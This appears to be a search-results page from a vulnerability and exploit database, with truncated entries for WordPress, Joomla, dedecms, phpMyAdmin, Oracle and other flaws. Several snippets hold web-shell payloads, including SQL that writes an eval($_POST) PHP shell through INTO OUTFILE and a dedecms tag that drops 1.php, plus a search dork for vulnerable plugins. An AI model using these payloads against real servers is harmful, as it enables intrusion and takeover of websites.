Wordpress Plugin Wp-insert [FCKeditor] Upload Shell

Exploit for php platform in category web applications Exploit Title: Wp-insert Wordpress Plugin FCKeditor Upload Date: 06-04-2012 Author: Hacker-Fire Category:: webapps Software Link: http://wordpress.org/extend/plugins/wp-insert/ Google dork: /wp-insert/fckeditor/ Tested on: Windows 7 & BT5r2 De...

Plume CMS 1.2.4 - Cross-Site Request Forgery

+--------------------------------------------------------------------------------------------------------------------------------+ Exploit Title : PlumeCMS CSRF Exploit to add and publish News inp...

Windows Manage Certificate Authority Injection

This module allows the attacker to insert an arbitrary CA certificate into the victim's Trusted Root store. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Windows Manage Certificate Authority...

DEBIAN-CVE-2011-3341

Multiple off-by-one errors in ordercmd.cpp in OpenTTD before 1.1.3 allow remote attackers to cause a denial of service daemon crash or possibly execute arbitrary code via a crafted CMDINSERTORDER command...

dedecms织梦 标签远程文件写入漏洞

No description provided by source. 前题条件，必须准备好自己的dede数据库，然后插入数据： insert into dedemytagaid,normbody values1,''dede:php$fp = @fopen"1.php", ''a'';@fwrite$fp, '''';echo "OK";@fclose$fp;/dede:php''; 再用下面表单提交，shell 就在同目录下 1.php。原理自己研究。。。 form action="" method="post" name="QuickSearch"...

phpmyadmin get shell four ways to summarize and repair-vulnerability warning-the black bar safety net

Method one: CREATE TABLE mysql.study 7on TEXT NOT NULL ; INSERT INTO mysql.study 7on VALUES '? php @eval$POST7on?& gt;'; SELECT 7onFROM study INTO OUTFILE 'E:/wamp/www/7.php'; ---- Or more simultaneously executed in the database: mysql create a table named: study, the field for the 7on, the 导出 到...

myBloggie 2.1.6 SQL Injection

myBloggie 2.1.6 SQL-Injection, Advanced INSERT INTO Injection technique Software: myBloggie 2.1.6 Severity: High Author: Robin Verton Date: Jun. 12 2011 Vendor: http://mybloggie.mywebland.com/ Software Description: "myBloggie is considered one of the most simple, user-friendliest yet packed with...

PT-2011-1077 · Suse +2 · Suse Linux Enterprise Kernel-Kdumppae +2

Name of the Vulnerable Software and Affected Versions: Linux kernel versions prior to 2.6.38.5 SUSE Linux Enterprise kernel-kdumppae affected versions not specified Description: The issue concerns an integer overflow in the Linux kernel, specifically in the agp generic insert memory function,...

WORDPRESS Plugin Accept Signups 0.1 XSS

Exploit for php platform in category web applications Exploit Title: WORDPRESS Plugin Accept Signups PERSISTENT XSS Date:21/12/2010 Author: clshack Software Link:http://wordpress.org/extend/plugins/accept-signups/ Version:0.1 Tested on: wordpress 3.03 CVE : Vulnerable code accept-signupssubmit.ph...

WordPress Plugin Accept Signups 0.1 - Cross-Site Scripting

Exploit Title: WORDPRESS Plugin Accept Signups PERSISTENT XSS Date:21/12/2010 Author: clshack Software Link:http://wordpress.org/extend/plugins/accept-signups/ Version:0.1 Tested on: wordpress 3.03 CVE : Vulnerable code accept-signupssubmit.php: requireonce'../../../wp-config.php';//addslashes to...

CVE-2010-4355

Cross-site scripting XSS vulnerability in DaDaBIK before 4.3 beta2, when the insert or edit feature is enabled, allows remote authenticated users to inject arbitrary web script or HTML via the selectsingle parameter...

LEADTOOLS v11.5.0.9 ltlst11n.ocx Insert() Access Violation

Exploit for windows platform in category dos / poc ========================================================== LEADTOOLS v11.5.0.9 ltlst11n.ocx Insert Access Violation ========================================================== Test Exploit Page targetFile = "C:\Program...

LeadTools 11.5.0.9 - 'ltlst11n.ocx' Insert() Access Violation Denial of Service

Test Exploit Page targetFile = "C:\Program Files\Rational\common\ltlst11n.ocx" prototype = "Function Insert ByVal Bitmap As Long , ByVal pszText As String , ByVal Data As Long As Integer" memberName = "Insert" progid = "LEADImgListLib.LEADImgList" argCount = 3 arg1=1 arg2="defaultV"...

Joomla Component com_jobs Upload Vulnerability

Exploit for php platform in category web applications ============================================== Joomla Component comjobs Upload Vulnerability ============================================== 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 1 1 /' \ /'\ /\ \ /'\ 0 0 /,...

CustomCMS - Persistent Cross-Site Scripting

CustomCMS - Persistent Cross-Site Scripting 1 1 0 I'm Sid3^effects member from Inj3ct0r Team 1 1 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 vendor URL :http://customcms.net/ Price:55$ Author : Sid3^effects aKa HaRi special thanks to : r0073r inj3ct0r.com,L0rd...

Oracle SQL Injection

Реализация SQL инъекций в Oracle. Введение. В статье рассматриваются особенности реализации уязвимости инъекции SQL-кода в СУБД Oracle. Хотя в настоящее время редко можно встретить использование этой СУБД в Веб программировании, но все-таки такое случается. В статью внесены изменения и дополнения...

Fedora 12 : asterisk-1.6.1.17-1.fc12 (2010-3381)

Update to 1.6.1.17 AST-2010-003: Invalid parsing of ACL rules can compromise security AST-2010-002: This security release is intended to raise awareness of how it is possible to insert malicious strings into dialplans, and to advise developers to read the best practices documents so that they may...

Oracle Database SQL Compiler Access Control Security Bypass (CVE-2007-3855)

There exists a security bypass vulnerability in the Oracle Database Server product. Specifically, the flaw exists due to improper enforcement of user permissions on data access to tables through certain types of views. A remote authenticated attacker may use this vulnerability to perform UPDATE,...

Cross site request forgery (csrf)

Cross-site request forgery CSRF vulnerability in index.php in OpenCart 1.4 allows remote attackers to hijack the authentication of an application administrator for requests that create an administrative account via a POST request with the route parameter set to "user/user/insert." NOTE: some of...

TR Forum 1.5 insert admin CSRF Vulnerability

Exploit for php platform in category web applications ============================================ TR Forum 1.5 insert admin CSRF Vulnerability ============================================ ======================================================================================== | Title : TR Forum...